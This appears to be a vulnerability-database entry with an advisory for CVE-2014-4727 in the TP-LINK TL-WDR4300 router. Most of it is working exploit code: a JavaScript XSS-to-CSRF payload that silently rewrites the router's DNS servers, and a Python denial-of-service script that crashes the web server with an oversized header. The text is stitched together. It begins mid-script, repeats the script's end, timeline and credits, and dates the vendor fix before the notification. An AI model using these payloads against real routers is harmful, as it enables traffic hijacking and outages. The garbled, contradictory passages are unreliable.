AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
conn.request("GET","/", "Let me tell you something", headers)
print "Done"
---- end wdr4300.py ----
Report Timeline:
===========
2014-07-04:
Vendor notified about the vulnerabilities with all the relevant technical information.
2013-09-16:
Vendor released a fix.
Credits:
======
The vulnerabilities were discovered by Oz Elisyan.
References:
========
http://www.tp-link.com/lk/products/details/?model=TL-WDR4300
| VAR-201409-0077 | CVE-2014-4727 | TP-LINK N750 Wireless Dual Band Gigabit Router firmware DHCP Cross-site scripting vulnerability in client page |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the DHCP clients page in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to inject arbitrary web script or HTML via the hostname in a DHCP request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has an HTML injection vulnerability because it does not adequately filter user-supplied input. An attacker can exploit this vulnerability to execute arbitrary HTML or script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
TP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company.
Advisory Information
===============
Vendors Contacted: TP-LINK
Vendor Patched: Yes, Firmware 140916
System Affected: N750 Wireless Dual Band Gigabit Router (TL-WDR4300), might affect others.
# DoS (web server) -
A denial-of-service condition can be triggered in the device web server: remotely or locally
send the device a "GET" request with an extra header carrying a long value (A x 3000 times).
Proof of Concept:
============
http://elisyan.com/tplink/wdr4300.html
---- start wdr4300.html ----
/*
Author: Oz Elisyan
Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check)
*/
var xmlhttp;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
    xmlhttp=new XMLHttpRequest();
}
else
{// code for IE6, IE5
    xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function()
{
    if (xmlhttp.readyState==4 && xmlhttp.status==200)
    {
        document.getElementById("myDiv").innerHTML=xmlhttp.responseText;
    }
}
xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true);
xmlhttp.send();
---- end wdr4300.html ----
http://elisyan.com/tplink/wdr4300.py
---- start wdr4300.py ----
#Author: Oz Elisyan
#TP-Link WDR4300 DoS PoC
import httplib
conn = httplib.HTTPConnection("192.168.0.1")
headers = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain", "DoS": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
conn.request("GET","/", "Let me tell you something", headers)
print "Done"
---- end wdr4300.py ----
Report Timeline:
===========
2014-07-04:
Vendor notified about the vulnerabilities with all the relevant technical information.
2013-09-16:
Vendor released a fix.
Credits:
======
The vulnerabilities were discovered by Oz Elisyan.
References:
========
http://www.tp-link.com/lk/products/details/?model=TL-WDR4300